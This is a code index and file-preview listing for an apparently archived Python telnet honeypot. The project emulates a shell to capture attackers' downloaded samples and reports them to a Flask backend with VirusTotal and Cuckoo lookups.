method cuckoo_check_if_dup (line 32) | def cuckoo_check_if_dup(self, sha256):
method postfile (line 52) | def postfile(self, artifact, fileName):
method posturl (line 72) | def posturl(self, scanUrl):
FILE: backend/db.py
function db_wrapper (line 22) | def db_wrapper(func, *args, **kwargs):
function now (line 39) | def now():
function filter_ascii (line 42) | def filter_ascii(string):
class IPRange (line 68) | class IPRange(Base):
class User (line 87) | class User(Base):
method json (line 96) | def json(self, depth=0):
class Network (line 101) | class Network(Base):
method json (line 115) | def json(self, depth=0):
class Malware (line 125) | class Malware(Base):
method json (line 132) | def json(self, depth=0):
class ASN (line 140) | class ASN(Base):
method json (line 152) | def json(self, depth=0):
class Sample (line 166) | class Sample(Base):
method json (line 183) | def json(self, depth=0):
class Connection (line 196) | class Connection(Base):
method json (line 235) | def json(self, depth=0):
class Url (line 285) | class Url(Base):
method json (line 306) | def json(self, depth=0):
class Tag (line 326) | class Tag(Base):
method json (line 335) | def json(self, depth=0):
function get_db (line 366) | def get_db():
function delete_everything (line 369) | def delete_everything():
class DB (line 381) | class DB:
method __init__ (line 383) | def __init__(self, sess):
method end (line 390) | def end(self):
method put_sample_data (line 398) | def put_sample_data(self, sha256, data):
method put_sample_result (line 406) | def put_sample_result(self, sha256, result):
method put_url (line 409) | def put_url(self, url, date, url_ip, url_asn, url_country):
method put_conn (line 416) | def put_conn(self, ip, user, password, date, text_combined, asn, block...
method put_sample (line 419) | def put_sample(self, sha256, name, length, date, info, result):
method link_conn_url (line 426) | def link_conn_url(self, id_conn, id_url):
method link_url_sample (line 429) | def link_url_sample(self, id_url, id_sample):
method link_conn_tag (line 432) | def link_conn_tag(self, id_conn, id_tag):
method get_conn_count (line 437) | def get_conn_count(self):
method get_sample_count (line 443) | def get_sample_count(self):
method get_url_count (line 449) | def get_url_count(self):
method search_sample (line 455) | def search_sample(self, q):
method search_url (line 459) | def search_url(self, q):
method get_url (line 470) | def get_url(self, url):
method get_url_conns (line 479) | def get_url_conns(self, id_url):
method get_url_conns_count (line 490) | def get_url_conns_count(self, id_url):
method get_sample_stats (line 498) | def get_sample_stats(self, date_from = 0):
method history_global (line 516) | def history_global(self, fromdate, todate, delta=3600):
method history_sample (line 526) | def history_sample(self, id_sample, fromdate, todate, delta=3600):
method get_samples (line 540) | def get_samples(self):
method get_sample (line 543) | def get_sample(self, sha256):
FILE: backend/ipdb/ipdb.py
function ipstr2int (line 7) | def ipstr2int(ip):
class Entry (line 13) | class Entry:
method __init__ (line 14) | def __init__(self, start, end, value):
class IPTable (line 19) | class IPTable:
method __init__ (line 20) | def __init__(self, fname):
method find_i (line 29) | def find_i(self, ip, start, end):
method __iter__ (line 43) | def __iter__(self):
method find_int (line 46) | def find_int(self, ip):
method find (line 49) | def find(self, ip):
function get_geo (line 52) | def get_geo():
function get_asn (line 55) | def get_asn():
function get_geo_iter (line 58) | def get_geo_iter():
class IPDB (line 63) | class IPDB:
method __init__ (line 64) | def __init__(self):
method find (line 68) | def find(self, ip):
FILE: backend/virustotal.py
class QuotaExceededError (line 9) | class QuotaExceededError(Exception):
method __str__ (line 10) | def __str__(self):
class Virustotal (line 13) | class Virustotal:
method __init__ (line 14) | def __init__(self, key):
method req (line 23) | def req(self, method, url, files=None, params=None, headers=None):
method upload_file (line 38) | def upload_file(self, f, fname):
method query_hash_sha256 (line 52) | def query_hash_sha256(self, h):
method put_comment (line 64) | def put_comment(self, obj, msg):
method get_best_result (line 76) | def get_best_result(self, r):
FILE: backend/virustotal_fill_db.py
function getName (line 13) | def getName(r):
FILE: backend/webcontroller.py
class WebController (line 27) | class WebController:
method __init__ (line 29) | def __init__(self):
method get_connection (line 33) | def get_connection(self, id):
method get_connections (line 42) | def get_connections(self, filter_obj={}, older_than=None):
method get_connections_fast (line 54) | def get_connections_fast(self):
method get_networks (line 71) | def get_networks(self):
method get_network (line 85) | def get_network(self, net_id):
method get_network_history (line 116) | def get_network_history(self, not_before, not_after, network_id):
method get_biggest_networks_history (line 143) | def get_biggest_networks_history(self, not_before, not_after):
method get_connection_locations (line 175) | def get_connection_locations(self, not_before, not_after, network_id =...
method get_malwares (line 190) | def get_malwares(self):
method get_sample (line 197) | def get_sample(self, sha256):
method get_newest_samples (line 202) | def get_newest_samples(self):
method get_url (line 209) | def get_url(self, url):
method get_newest_urls (line 214) | def get_newest_urls(self):
method get_tag (line 221) | def get_tag(self, name):
method get_tags (line 226) | def get_tags(self):
method get_country_stats (line 233) | def get_country_stats(self):
method get_asn (line 240) | def get_asn(self, asn):
method connhash_tree_lines (line 251) | def connhash_tree_lines(self, lines, mincount):
method connhash_tree (line 280) | def connhash_tree(self, layers):
FILE: honeypot.py
function import_file (line 17) | def import_file(fname):
function rerun_file (line 31) | def rerun_file(fname):
function signal_handler (line 47) | def signal_handler(signal, frame):
FILE: honeypot/__main__.py
function signal_handler (line 6) | def signal_handler(signal, frame):
FILE: honeypot/client.py
class Client (line 10) | class Client:
method __init__ (line 12) | def __init__(self):
method test_login (line 20) | def test_login(self):
method put_session (line 32) | def put_session(self, session, retry=True):
method put_sample (line 50) | def put_sample(self, data, retry=True):
FILE: honeypot/sampledb_client.py
function get_backend (line 14) | def get_backend():
function sha256 (line 25) | def sha256(data):
class SampleRecord (line 30) | class SampleRecord:
method __init__ (line 32) | def __init__(self, url, name, info, data):
method json (line 45) | def json(self):
class SessionRecord (line 56) | class SessionRecord:
method __init__ (line 58) | def __init__(self):
method log_raw (line 73) | def log_raw(self, obj):
method json (line 79) | def json(self):
method addInput (line 90) | def addInput(self, text):
method addOutput (line 97) | def addOutput(self, text):
method set_login (line 104) | def set_login(self, ip, user, password):
method add_file (line 110) | def add_file(self, data, url=None, name=None, info=None):
method commit (line 122) | def commit(self):
FILE: honeypot/session.py
class Session (line 22) | class Session:
method __init__ (line 23) | def __init__(self, output, remote_addr):
method login (line 36) | def login(self, user, password):
method download (line 42) | def download(self, data):
method found_file (line 56) | def found_file(self, path, data):
method end (line 67) | def end(self):
method send_string (line 78) | def send_string(self, text):
method shell (line 82) | def shell(self, l):
FILE: honeypot/shell/commands/base.py
class Proc (line 6) | class Proc:
method register (line 10) | def register(name, obj):
method get (line 14) | def get(name):
class StaticProc (line 20) | class StaticProc(Proc):
method __init__ (line 21) | def __init__(self, output, result=0):
method run (line 25) | def run(self, env, args):
class FuncProc (line 29) | class FuncProc(Proc):
method __init__ (line 30) | def __init__(self, func):
method run (line 33) | def run(self, env, args):
class Exec (line 39) | class Exec(Proc):
method run (line 41) | def run(self, env, args):
class BusyBox (line 76) | class BusyBox(Proc):
method run (line 78) | def run(self, env, args):
class Cat (line 100) | class Cat(Proc):
method run (line 102) | def run(self, env, args):
class Echo (line 112) | class Echo(Proc):
method run (line 114) | def run(self, env, args):
class Rm (line 131) | class Rm(Proc):
method run (line 133) | def run(self, env, args):
class Ls (line 141) | class Ls(Proc):
method run (line 143) | def run(self, env, args):
class Dd (line 148) | class Dd(Proc):
method run (line 150) | def run(self, env, args):
class Cp (line 180) | class Cp(Proc):
method run (line 182) | def run(self, env, args):
FILE: honeypot/shell/commands/binary.py
function dbg (line 6) | def dbg(s):
function run_binary (line 9) | def run_binary(data, fname, args, env):
FILE: honeypot/shell/commands/cmd_util.py
function easy_getopt (line 3) | def easy_getopt(args, opt, longopts=[]):
FILE: honeypot/shell/commands/shell.py
class Shell (line 3) | class Shell(Proc):
method run (line 5) | def run(self, env, args):
FILE: honeypot/shell/commands/shellcode.py
class Shellcode (line 4) | class Shellcode():
method run (line 6) | def run(self, data):
FILE: honeypot/shell/commands/tftp.py
class DummyIO (line 14) | class DummyIO(io.RawIOBase):
method __init__ (line 16) | def __init__(self):
method write (line 19) | def write(self, s):
class StaticTftp (line 22) | class StaticTftp(Proc):
method run (line 24) | def run(self, env, args):
class Tftp (line 27) | class Tftp:
method run (line 43) | def run(self, env, args):
method download (line 110) | def download(self, host, port, fname):
method pkt (line 121) | def pkt(self, data):
FILE: honeypot/shell/commands/wget.py
class Wget (line 11) | class Wget(Proc):
method dl (line 13) | def dl(self, env, url, path=None, echo=True):
method run (line 97) | def run(self, env, args):
FILE: honeypot/shell/grammar.py
class TreeNode (line 5) | class TreeNode(object):
method __init__ (line 6) | def __init__(self, text, offset, elements=None):
method __iter__ (line 11) | def __iter__(self):
class TreeNode1 (line 16) | class TreeNode1(TreeNode):
method __init__ (line 17) | def __init__(self, text, offset, elements):
class TreeNode2 (line 22) | class TreeNode2(TreeNode):
method __init__ (line 23) | def __init__(self, text, offset, elements):
class TreeNode3 (line 29) | class TreeNode3(TreeNode):
method __init__ (line 30) | def __init__(self, text, offset, elements):
class TreeNode4 (line 35) | class TreeNode4(TreeNode):
method __init__ (line 36) | def __init__(self, text, offset, elements):
class TreeNode5 (line 42) | class TreeNode5(TreeNode):
method __init__ (line 43) | def __init__(self, text, offset, elements):
class TreeNode6 (line 48) | class TreeNode6(TreeNode):
method __init__ (line 49) | def __init__(self, text, offset, elements):
class TreeNode7 (line 55) | class TreeNode7(TreeNode):
method __init__ (line 56) | def __init__(self, text, offset, elements):
class TreeNode8 (line 61) | class TreeNode8(TreeNode):
method __init__ (line 62) | def __init__(self, text, offset, elements):
class TreeNode9 (line 68) | class TreeNode9(TreeNode):
method __init__ (line 69) | def __init__(self, text, offset, elements):
class TreeNode10 (line 75) | class TreeNode10(TreeNode):
method __init__ (line 76) | def __init__(self, text, offset, elements):
class TreeNode11 (line 81) | class TreeNode11(TreeNode):
method __init__ (line 82) | def __init__(self, text, offset, elements):
class ParseError (line 87) | class ParseError(SyntaxError):
class Grammar (line 94) | class Grammar(object):
method _read_cmd (line 99) | def _read_cmd(self):
method _read_cmdlist (line 115) | def _read_cmdlist(self):
method _read_cmdsingle (line 211) | def _read_cmdsingle(self):
method _read_cmdpipe (line 307) | def _read_cmdpipe(self):
method _read_cmdredir (line 423) | def _read_cmdredir(self):
method _read_cmdargs (line 615) | def _read_cmdargs(self):
method _read_cmdbrac (line 631) | def _read_cmdbrac(self):
method _read_args (line 705) | def _read_args(self):
method _read_arg (line 785) | def _read_arg(self):
method _read_arg_noempty (line 807) | def _read_arg_noempty(self):
method _read_arg_quot1 (line 826) | def _read_arg_quot1(self):
method _read_arg_quot2 (line 908) | def _read_arg_quot2(self):
method _read_arg_noquot (line 990) | def _read_arg_noquot(self):
method _read_empty (line 1022) | def _read_empty(self):
method _read_sep (line 1048) | def _read_sep(self):
class Parser (line 1081) | class Parser(Grammar):
method __init__ (line 1082) | def __init__(self, input, actions, types):
method parse (line 1092) | def parse(self):
function format_error (line 1102) | def format_error(input, offset, expected):
function parse (line 1113) | def parse(input, actions=None, types=None):
FILE: honeypot/shell/shell.py
function filter_ascii (line 7) | def filter_ascii(string):
function instantwrite (line 44) | def instantwrite(msg):
class Env (line 48) | class Env:
method __init__ (line 49) | def __init__(self, output=instantwrite):
method write (line 55) | def write(self, string):
method deleteFile (line 58) | def deleteFile(self, path):
method writeFile (line 63) | def writeFile(self, path, string):
method readFile (line 69) | def readFile(self, path):
method listen (line 77) | def listen(self, event, handler):
method action (line 80) | def action(self, event, data):
method listfiles (line 86) | def listfiles(self):
class RedirEnv (line 89) | class RedirEnv:
method __init__ (line 90) | def __init__(self, baseenv, redir):
method write (line 94) | def write(self, string):
method deleteFile (line 97) | def deleteFile(self, path):
method writeFile (line 100) | def writeFile(self, path, string):
method readFile (line 103) | def readFile(self, path):
method listen (line 106) | def listen(self, event, handler):
method action (line 109) | def action(self, event, data):
method listfiles (line 112) | def listfiles(self):
class Command (line 115) | class Command:
method __init__ (line 116) | def __init__(self, args):
method redirect_to (line 123) | def redirect_to(self, filename):
method redirect_from (line 127) | def redirect_from(self, filename):
method redirect_app (line 130) | def redirect_app(self, filename):
method run (line 134) | def run(self, env):
method isnone (line 145) | def isnone(self):
method __str__ (line 148) | def __str__(self):
class CommandList (line 151) | class CommandList:
method __init__ (line 153) | def __init__(self, mode, cmd1, cmd2):
method redirect_to (line 158) | def redirect_to(self, filename):
method redirect_from (line 162) | def redirect_from(self, filename):
method redirect_app (line 166) | def redirect_app(self, filename):
method run (line 170) | def run(self, env):
method isnone (line 190) | def isnone(self):
method __str__ (line 193) | def __str__(self):
class Actions (line 196) | class Actions(object):
method make_arg_noquot (line 197) | def make_arg_noquot(self, input, start, end, elements):
method make_arg_quot (line 200) | def make_arg_quot(self, input, start, end, elements):
method make_list (line 203) | def make_list(self, input, start, end, elements):
method make_single (line 213) | def make_single(self, input, start, end, elements):
method make_pipe (line 224) | def make_pipe(self, input, start, end, elements):
method make_redir (line 238) | def make_redir(self, input, start, end, elements):
method make_cmdbrac (line 257) | def make_cmdbrac(self, input, start, end, elements):
method make_args (line 260) | def make_args(self, input, start, end, elements):
function run (line 274) | def run(string, env):
function test_shell (line 278) | def test_shell():
FILE: honeypot/telnet.py
class IPFilter (line 12) | class IPFilter:
method __init__ (line 14) | def __init__(self):
method add_ip (line 18) | def add_ip(self, ip):
method is_allowed (line 21) | def is_allowed(self, ip):
method clean (line 25) | def clean(self):
class Telnetd (line 36) | class Telnetd:
method __init__ (line 75) | def __init__(self, addr, port):
method run (line 82) | def run(self):
method handle (line 95) | def handle(self):
method stop (line 111) | def stop(self):
class TelnetSess (line 114) | class TelnetSess:
method __init__ (line 115) | def __init__(self, serv, sock, remote):
method loop (line 124) | def loop(self):
method test_naws (line 166) | def test_naws(self):
method test_linemode (line 186) | def test_linemode(self):
method test_opt (line 192) | def test_opt(self, opt, do=True):
method send (line 202) | def send(self, byte):
method send_string (line 209) | def send_string(self, msg):
method recv (line 213) | def recv(self):
method recv_line (line 224) | def recv_line(self):
method recv_short (line 240) | def recv_short(self):
method need (line 246) | def need(self, byte_need):
method process_cmd (line 257) | def process_cmd(self, cmd):
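TelnetSess's `test_opt`, `test_naws`, `test_linemode`, and `process_cmd` methods point at standard Telnet option negotiation (RFC 854, RFC 1073, RFC 1184), where each negotiation command is a three-byte IAC sequence. A minimal sketch of building and parsing such sequences follows; the byte constants come from the RFCs, while the helper names are ours, not the repository's:

```python
import struct

# Telnet command and option codes from RFC 854 / RFC 1073 / RFC 1184.
IAC, WILL, WONT, DO, DONT = 255, 251, 252, 253, 254
NAWS, LINEMODE = 31, 34  # window size, linemode

def iac(cmd, opt):
    """Build a 3-byte IAC negotiation sequence."""
    return struct.pack("!BBB", IAC, cmd, opt)

def parse_iac(data):
    """Parse one 3-byte IAC sequence into (command, option)."""
    marker, cmd, opt = struct.unpack("!BBB", data[:3])
    assert marker == IAC, "not an IAC sequence"
    return cmd, opt

# Ask the client to report its window size, as a banner phase might:
assert iac(DO, NAWS) == b"\xff\xfd\x1f"
assert parse_iac(b"\xff\xfb\x22") == (WILL, LINEMODE)
```

Probing options like NAWS is a common fingerprinting trick in telnet honeypots: real terminal clients answer the negotiation, while many bots ignore it.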
FILE: html/common.js
function extractHash (line 4) | function extractHash() {
function formatDate (line 17) | function formatDate(date) {
function formatDay (line 24) | function formatDay(date) {
function formatDateTime (line 29) | function formatDateTime(date) {
function time (line 35) | function time() {
function nicenull (line 39) | function nicenull (str, el) {
function short (line 46) | function short (str, l) {
function encurl (line 53) | function encurl(url) {
function decurl (line 57) | function decurl(url) {
FILE: html/sample.js
function roundDate (line 188) | function roundDate(date) {
function network_graph_data (line 192) | function network_graph_data(networks)
FILE: tftpy/TftpClient.py
class TftpClient (line 10) | class TftpClient(TftpSession):
method __init__ (line 15) | def __init__(self, host, port, options={}):
method download (line 28) | def download(self, filename, output, packethook=None, timeout=SOCK_TIM...
method upload (line 68) | def upload(self, filename, input, packethook=None, timeout=SOCK_TIMEOUT):
FILE: tftpy/TftpContexts.py
class TftpMetrics (line 21) | class TftpMetrics(object):
method __init__ (line 23) | def __init__(self):
method compute (line 41) | def compute(self):
method add_dup (line 53) | def add_dup(self, pkt):
class TftpContext (line 67) | class TftpContext(object):
method __init__ (line 70) | def __init__(self, host, port, timeout, dyn_file_func=None):
method getBlocksize (line 101) | def getBlocksize(self):
method __del__ (line 105) | def __del__(self):
method checkTimeout (line 111) | def checkTimeout(self, now):
method start (line 118) | def start(self):
method end (line 121) | def end(self):
method gethost (line 130) | def gethost(self):
method sethost (line 134) | def sethost(self, host):
method setNextBlock (line 142) | def setNextBlock(self, block):
method getNextBlock (line 148) | def getNextBlock(self):
method cycle (line 153) | def cycle(self):
class TftpContextServer (line 195) | class TftpContextServer(TftpContext):
method __init__ (line 197) | def __init__(self, host, port, timeout, root, dyn_file_func=None):
method __str__ (line 210) | def __str__(self):
method start (line 213) | def start(self, buffer):
method end (line 233) | def end(self):
class TftpContextClientUpload (line 240) | class TftpContextClientUpload(TftpContext):
method __init__ (line 243) | def __init__(self,
method __str__ (line 267) | def __str__(self):
method start (line 270) | def start(self):
method end (line 305) | def end(self):
class TftpContextClientDownload (line 312) | class TftpContextClientDownload(TftpContext):
method __init__ (line 315) | def __init__(self,
method __str__ (line 345) | def __str__(self):
method start (line 348) | def start(self):
method end (line 382) | def end(self):
FILE: tftpy/TftpPacketFactory.py
class TftpPacketFactory (line 8) | class TftpPacketFactory(object):
method __init__ (line 12) | def __init__(self):
method parse (line 22) | def parse(self, buffer):
method __create (line 33) | def __create(self, opcode):
FILE: tftpy/TftpPacketTypes.py
class TftpSession (line 7) | class TftpSession(object):
class TftpPacketWithOptions (line 13) | class TftpPacketWithOptions(object):
method __init__ (line 18) | def __init__(self):
method setoptions (line 21) | def setoptions(self, options):
method getoptions (line 34) | def getoptions(self):
method decode_options (line 43) | def decode_options(self, buffer):
class TftpPacket (line 82) | class TftpPacket(object):
method __init__ (line 86) | def __init__(self):
method encode (line 90) | def encode(self):
method decode (line 98) | def decode(self):
class TftpPacketInitial (line 108) | class TftpPacketInitial(TftpPacket, TftpPacketWithOptions):
method __init__ (line 111) | def __init__(self):
method encode (line 117) | def encode(self):
method decode (line 161) | def decode(self):
class TftpPacketRRQ (line 201) | class TftpPacketRRQ(TftpPacketInitial):
method __init__ (line 210) | def __init__(self):
method __str__ (line 214) | def __str__(self):
class TftpPacketWRQ (line 221) | class TftpPacketWRQ(TftpPacketInitial):
method __init__ (line 230) | def __init__(self):
method __str__ (line 234) | def __str__(self):
class TftpPacketDAT (line 241) | class TftpPacketDAT(TftpPacket):
method __init__ (line 250) | def __init__(self):
method __str__ (line 256) | def __str__(self):
method encode (line 262) | def encode(self):
method decode (line 274) | def decode(self):
class TftpPacketACK (line 289) | class TftpPacketACK(TftpPacket):
method __init__ (line 298) | def __init__(self):
method __str__ (line 303) | def __str__(self):
method encode (line 306) | def encode(self):
method decode (line 312) | def decode(self):
class TftpPacketERR (line 318) | class TftpPacketERR(TftpPacket):
method __init__ (line 341) | def __init__(self):
method __str__ (line 359) | def __str__(self):
method encode (line 364) | def encode(self):
method decode (line 375) | def decode(self):
class TftpPacketOACK (line 396) | class TftpPacketOACK(TftpPacket, TftpPacketWithOptions):
method __init__ (line 404) | def __init__(self):
method __str__ (line 409) | def __str__(self):
method encode (line 412) | def encode(self):
method decode (line 426) | def decode(self):
method match_options (line 430) | def match_options(self, options):
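The packet classes above follow the TFTP wire format of RFC 1350, where a read request (RRQ, opcode 1) is a 2-byte opcode followed by a NUL-terminated filename and a NUL-terminated transfer mode. The sketch below encodes and decodes that layout directly from the RFC; it is not the repository's `encode`/`decode` code, and the filename is purely illustrative:

```python
import struct

def encode_rrq(filename, mode="octet"):
    """RFC 1350 read request: !H opcode (1), filename, NUL, mode, NUL."""
    return struct.pack("!H", 1) + filename.encode() + b"\x00" + mode.encode() + b"\x00"

def decode_rrq(data):
    """Inverse of encode_rrq; raises on a non-RRQ opcode."""
    opcode, = struct.unpack("!H", data[:2])
    assert opcode == 1, "not an RRQ"
    filename, mode, _rest = data[2:].split(b"\x00", 2)
    return filename.decode(), mode.decode()

pkt = encode_rrq("payload.bin")  # illustrative filename
assert pkt == b"\x00\x01payload.bin\x00octet\x00"
assert decode_rrq(pkt) == ("payload.bin", "octet")
```

This is the request a `tftp -g` style command inside the honeypot shell would ultimately emit, which is why the bundled tftpy client matters for capturing samples.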
FILE: tftpy/TftpServer.py
class TftpServer (line 13) | class TftpServer(TftpSession):
method __init__ (line 21) | def __init__(self, tftproot='/tftpboot', dyn_file_func=None):
method listen (line 49) | def listen(self,
FILE: tftpy/TftpShared.py
function tftpassert (line 23) | def tftpassert(condition, msg):
function setLogLevel (line 31) | def setLogLevel(level):
class TftpErrors (line 38) | class TftpErrors(object):
class TftpException (line 51) | class TftpException(Exception):
class TftpTimeout (line 56) | class TftpTimeout(TftpException):
FILE: tftpy/TftpStates.py
class TftpState (line 19) | class TftpState(object):
method __init__ (line 22) | def __init__(self, context):
method handle (line 28) | def handle(self, pkt, raddress, rport):
method handleOACK (line 33) | def handleOACK(self, pkt):
method returnSupportedOptions (line 49) | def returnSupportedOptions(self, options):
method serverInitial (line 76) | def serverInitial(self, pkt, raddress, rport):
method sendDAT (line 127) | def sendDAT(self):
method sendACK (line 159) | def sendACK(self, blocknumber=None):
method sendError (line 174) | def sendError(self, errorcode):
method sendOACK (line 185) | def sendOACK(self):
method resendLast (line 196) | def resendLast(self):
method handleDat (line 207) | def handleDat(self, pkt):
class TftpStateServerRecvRRQ (line 248) | class TftpStateServerRecvRRQ(TftpState):
method handle (line 251) | def handle(self, pkt, raddress, rport):
class TftpStateServerRecvWRQ (line 293) | class TftpStateServerRecvWRQ(TftpState):
method handle (line 296) | def handle(self, pkt, raddress, rport):
class TftpStateServerStart (line 327) | class TftpStateServerStart(TftpState):
method handle (line 331) | def handle(self, pkt, raddress, rport):
class TftpStateExpectACK (line 349) | class TftpStateExpectACK(TftpState):
method handle (line 354) | def handle(self, pkt, raddress, rport):
class TftpStateExpectDAT (line 388) | class TftpStateExpectDAT(TftpState):
method handle (line 390) | def handle(self, pkt, raddress, rport):
class TftpStateSentWRQ (line 413) | class TftpStateSentWRQ(TftpState):
method handle (line 415) | def handle(self, pkt, raddress, rport):
class TftpStateSentRRQ (line 471) | class TftpStateSentRRQ(TftpState):
method handle (line 473) | def handle(self, pkt, raddress, rport):
FILE: util/config.py
function rand (line 5) | def rand():
class Config (line 9) | class Config:
method __init__ (line 10) | def __init__(self):
method loadyaml (line 18) | def loadyaml(self, filename):
method loadUserConfig (line 23) | def loadUserConfig(self, filename):
method get (line 29) | def get(self, key, optional=False, default=None):
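Taken together, `loadyaml`, `loadUserConfig`, and `get(key, optional=False, default=None)` imply a layered lookup: `config.dist.yaml` supplies defaults and a local `config.yaml` overrides them. A simplified stand-in for that behavior (not the repository's implementation; the key names are invented, and the real class would populate its layers with `yaml.safe_load`):

```python
# Illustrative layered config: defaults come from the distribution file,
# user overrides win, and missing required keys fail loudly.

class LayeredConfig:
    def __init__(self, defaults, overrides=None):
        # In the real Config these dicts would come from parsing
        # config.dist.yaml and config.yaml respectively.
        self.data = dict(defaults)
        self.data.update(overrides or {})

    def get(self, key, optional=False, default=None):
        if key in self.data:
            return self.data[key]
        if optional:
            return default
        raise KeyError("missing required config key: %s" % key)

cfg = LayeredConfig({"http_port": 5000}, {"http_port": 8080})
assert cfg.get("http_port") == 8080                      # override wins
assert cfg.get("vt_key", optional=True, default="") == ""  # optional key
```

Failing hard on missing required keys (rather than silently returning None) is a sensible choice for a daemon that is usually started unattended.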
FILE: util/dbg.py
function dbg (line 8) | def dbg(msg):
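The preview of util/dbg.py shows `dbg` as a timestamped print gated on a module-level `DEBUG` flag. A simplified sketch of that pattern (this version also returns the formatted line, which the original does not; that change is ours, made so the behavior is easy to check):

```python
import datetime

DEBUG = True

def dbg(msg):
    """Timestamped debug line, emitted only when DEBUG is set."""
    line = "[%s] %s" % (datetime.datetime.now().strftime("%H:%M:%S"), msg)
    if DEBUG:
        print(line)
    return line

dbg("sample downloaded")
```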
Condensed preview — 82 files, each showing path, character count, and a content snippet (full structured content: 346K chars).
[
{
"path": ".gitignore",
"chars": 144,
"preview": "*.pyc\n*.db\nsamples/\nMirai-Source-Code-master/\nobf.py\nimport-lost-conns.py\nimport-length.py\nreview-sampels.py\n*.kate-swp\n"
},
{
"path": "Dockerfile",
"chars": 195,
"preview": "FROM python:2\n\nWORKDIR /usr/src/app\n\nCOPY ./requirements.txt ./\nRUN pip install --no-cache-dir -r requirements.txt\nRUN p"
},
{
"path": "INSTALL.md",
"chars": 3686,
"preview": "# Installation\n\nFor installation instructions, go to section Manual installation.\nHowever, if you just want to get every"
},
{
"path": "README.md",
"chars": 4124,
"preview": "## Disclaimer\n\nThis project neither supported or in development anymore. It is based on python2 which has reached its EO"
},
{
"path": "backend/__init__.py",
"chars": 0,
"preview": ""
},
{
"path": "backend/additionalinfo.py",
"chars": 2836,
"preview": "import dns.resolver\nimport ipaddress\nimport urlparse\nimport re\nimport traceback\n\nimport ipdb.ipdb\n\ndef filter_ascii(stri"
},
{
"path": "backend/authcontroller.py",
"chars": 1969,
"preview": "import os\nimport hashlib\nimport traceback\nimport struct\nimport json\nimport time\n\nimport additionalinfo\nimport ipdb.ipdb\n"
},
{
"path": "backend/backend.py",
"chars": 7450,
"preview": "from flask import Flask, request, Response, redirect, send_from_directory\nfrom flask_httpauth import HTTPBasicAuth\nfrom "
},
{
"path": "backend/clientcontroller.py",
"chars": 13057,
"preview": "import os\nimport hashlib\nimport traceback\nimport struct\nimport json\nimport time\nimport socket\nimport urlparse\nimport ran"
},
{
"path": "backend/cuckoo.py",
"chars": 3086,
"preview": "import json\nimport os\ntry:\n from urllib.parse import urlparse, urljoin\nexcept ImportError:\n from urlparse import u"
},
{
"path": "backend/db.py",
"chars": 16947,
"preview": "import time\nimport json\nimport sqlalchemy\nimport random\n\nfrom decorator import decorator\n\nfrom sqlalchemy import Table, "
},
{
"path": "backend/ipdb/.gitignore",
"chars": 12,
"preview": "*.CSV\n*.csv\n"
},
{
"path": "backend/ipdb/__init__.py",
"chars": 0,
"preview": ""
},
{
"path": "backend/ipdb/ipdb.py",
"chars": 2113,
"preview": "\nimport csv\nimport ipaddress\nimport struct\nimport os\n\ndef ipstr2int(ip):\n\tip = unicode(ip)\n\tip = ipaddress.IPv4Address(i"
},
{
"path": "backend/virustotal.py",
"chars": 2259,
"preview": "import requests\nimport time\nimport db\nimport Queue\n\nfrom util.config import config\n\n\nclass QuotaExceededError(Exception)"
},
{
"path": "backend/virustotal_fill_db.py",
"chars": 828,
"preview": "import os\n\nfrom util.dbg import dbg\nfrom virustotal import Virustotal\nfrom sampledb import Sampledb\n\nvt = Virustotal()\n"
},
{
"path": "backend/webcontroller.py",
"chars": 7682,
"preview": "import os\nimport hashlib\nimport traceback\nimport struct\nimport json\nimport time\nimport math\n\nimport additionalinfo\nimpor"
},
{
"path": "backend.py",
"chars": 1950,
"preview": "import sys\nimport json\nimport traceback\n\nfrom util.config import config\n\nif len(sys.argv) > 1 and sys.argv[1] == \"cleard"
},
{
"path": "config.dist.yaml",
"chars": 2509,
"preview": "# This is the default (distribution) config file\n# For local configuration, please create and edit the file \"config.yaml"
},
{
"path": "create_config.sh",
"chars": 293,
"preview": "#!/bin/bash\n\nif [ -f config.yaml ]; then\n\techo \"config.yaml already exists, aborting\"\n\texit\nfi\n\nuser=admin\npass=$(openss"
},
{
"path": "create_docker.sh",
"chars": 2451,
"preview": "#!/bin/bash\n\nif [ -f config.yaml ]; then\n\techo -n \"config.yaml already exists, delete it? (Y/n): \"\n\tread force\n\tif [ \"$f"
},
{
"path": "honeypot/__init__.py",
"chars": 0,
"preview": ""
},
{
"path": "honeypot/__main__.py",
"chars": 206,
"preview": "import signal\n\nfrom telnet import Telnetd\nfrom util.dbg import dbg\n\ndef signal_handler(signal, frame):\n\tdbg('Ctrl+C')\n\ts"
},
{
"path": "honeypot/client.py",
"chars": 1717,
"preview": "import requests\nimport requests.exceptions\nimport requests.auth\n\nimport json\n\nfrom util.dbg import dbg\nfrom util.config "
},
{
"path": "honeypot/sampledb_client.py",
"chars": 3092,
"preview": "import client\nimport time\nimport traceback\nimport os\nimport requests\nimport hashlib\nimport json\n\nfrom util.dbg import db"
},
{
"path": "honeypot/session.py",
"chars": 1969,
"preview": "import re\nimport random\nimport time\nimport json\nimport traceback\n\nimport struct\nimport socket\nimport select\nimport errno"
},
{
"path": "honeypot/shell/__init__.py",
"chars": 0,
"preview": ""
},
{
"path": "honeypot/shell/commands/__init__.py",
"chars": 0,
"preview": ""
},
{
"path": "honeypot/shell/commands/base.py",
"chars": 5326,
"preview": "import sys\nimport traceback\n\nfrom binary import run_binary\n\nclass Proc:\n procs = {}\n\n @staticmethod\n def regist"
},
{
"path": "honeypot/shell/commands/binary.py",
"chars": 2521,
"preview": "\nimport socket\nimport struct\nimport select\n\ndef dbg(s):\n print s\n\ndef run_binary(data, fname, args, env):\n dbg(\"Pa"
},
{
"path": "honeypot/shell/commands/cmd_util.py",
"chars": 227,
"preview": "from getopt import gnu_getopt, GetoptError\n\ndef easy_getopt(args, opt, longopts=[]):\n\toptlist, args = gnu_getopt(args, o"
},
{
"path": "honeypot/shell/commands/shell.py",
"chars": 675,
"preview": "from base import Proc\n\nclass Shell(Proc):\n \n def run(self, env, args):\n from honeypot.shell.shell import ru"
},
{
"path": "honeypot/shell/commands/shellcode.py",
"chars": 1641,
"preview": "\nfrom base import Proc\n\nclass Shellcode():\n\n\tdef run(self, data):\n\t\tdbg(\"Parsing stub downloader (\" + str(len(data))"
},
{
"path": "honeypot/shell/commands/tftp.py",
"chars": 2586,
"preview": "#!/usr/bin/env python\n\nimport io\nimport traceback\n\nfrom getopt import gnu_getopt, GetoptError\nfrom tftpy import TftpCli"
},
{
"path": "honeypot/shell/commands/wget.py",
"chars": 3404,
"preview": "\nimport requests\nimport traceback\nimport datetime\nimport urlparse\n\nfrom util.config import config\n\nfrom base import "
},
{
"path": "honeypot/shell/grammar.peg",
"chars": 1109,
